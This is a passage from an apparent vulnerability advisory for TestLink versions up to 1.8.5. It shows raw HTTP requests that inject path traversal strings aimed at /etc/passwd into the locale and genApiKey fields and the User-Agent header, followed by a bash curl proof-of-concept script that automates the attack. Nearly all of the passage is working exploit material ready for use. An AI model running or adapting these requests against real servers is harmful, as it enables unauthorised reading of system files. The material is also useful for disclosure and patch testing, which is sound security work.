a)Directory traverasa : The POST variable locale has been set to ../../../../../../../../etc/passwd%00.html.
-----------------------------------------------------------------------------------------------------------
Request

POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 10.209.84.1
Content-Length: 153
Cookie: PHPSESSID=ad966ffbe53232c258f231404cef4552;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache

id=1&firstName=Testlink&lastName=Administrator&emailAddress=111-222-1933email@address.tst&locale=../../../../../../../../etc/passwd%00.html&editUser=SaveResponse


-----------------------------------------------------------------------------------------------------------------------------------
b)Directory Traversal : The POST variable genApiKey has been set to ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
------------------------------------------------------------------------------------------------------------------------------------
Request

POST /testlink/lib/usermanagement/userInfo.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 10.209.84.1
Content-Length: 81
Cookie: PHPSESSID=ad966ffbe53232c258f231404cef4552;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache

id=1&genApiKey=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


One of the issues in Testlink 1.8.4 can be exploited by directory traversing with the HTTP User-Agent header like below.

-----------------------------------------------------------------------------------------------------------------------------------
c)Directory Traversal :The HTTP header user-agent has been set to ../../../../../../../../etc/passwd .htm.
------------------------------------------------------------------------------------------------------------------------------------

Request

GET /testlink/lib/usermanagement/userInfo.php HTTP/1.0
Accept: */*
User-Agent: ../../../../../../../../etc/passwd .htm
Host: 10.209.84.1
Cookie: PHPSESSID=ad966ffbe53232c258f231404cef4552;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cacheResponse


5.Proof of Concept

================
#!/usr/bin/env bash
# Prashant Khandelwal [clickprashant@gmail.com]
# Remote Directory Traversal in Testlink the Test Management Tool
# Vendor : Testlink http://www.teamst.org
# Affected Version : <=1.8.5 (http://downloads.sourceforge.net/project/testlink/TestLink%201.8/TestLink%201.8.5/testlink_1.8.5.tgz?use_mirror=nchc)
# Vulnerability Discovered: 5-Jan-2010
# This POC is for Educational purpose & has only been tested with testlink 1.8.5

if [ $# -ne 4 ]
then

echo "Usage - ./$0 User password Testlink_root_dir_URI Directory_traversal_string"
echo "Example - ./$0 admin admin http://Testlink-Server/testlink ../../../../../../../../etc/passwd%00.html"
exit 1
fi
rm -rf cookies output.txt
curl -d "tl_login=$1&tl_password=$2" $3/login.php -c cookies
curl -d "id=1&firstName=Directorytraversal&lastName=Exploit&emailAddress=111-222-1933email%40address%2Etst&locale=$4&editUser=admin" $3/lib/usermanagement/userInfo.php -b cookies -v | more >output.txt
head -n 80 output.txt